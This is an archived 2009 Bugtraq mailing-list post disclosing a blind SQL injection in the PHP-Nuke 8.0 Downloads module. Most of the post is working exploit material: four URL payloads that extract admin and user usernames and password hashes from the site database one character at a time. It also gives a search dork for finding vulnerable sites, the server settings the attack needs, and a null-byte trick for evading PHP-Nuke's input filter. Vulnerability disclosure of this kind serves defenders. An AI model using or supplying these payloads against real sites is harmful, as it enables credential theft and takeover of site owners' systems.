Bugtraq mailing list archives
PHP-Nuke 8.0 Downloads Blind Sql Injection
From: r3d.w0rm () yahoo com
Date: Fri, 23 Jan 2009 03:45:34 -0700
##################################################################################### #### PHP-Nuke 8.0 Downloads Blind Sql Injection #### ##################################################################################### # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Download : http://phpnuke.org # # # #Dork : inurl:modules.php?name=Downloads "PHP-Nuke" # # # ##################################################################################### # [Bug] # # # #Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker () devil net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker () devil net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker () devil net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* #Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker () devil net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* # # ##################################################################################### # [Note] # # # #1. magic_quotes_gpc = Off # #2. register_globals = On # #3. For using bug you must login via a simple user. # #4. After using bug go to this url : # #http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker () devil net&title=zz&url=zz&description=zz #5. I use ascii codes and null byte in url for bypass nuke security function # # please don't change ascii code and %00. # # # ###################################### TNX GOD ######################################
Current thread:
- PHP-Nuke 8.0 Downloads Blind Sql Injection r3d . w0rm (Jan 23)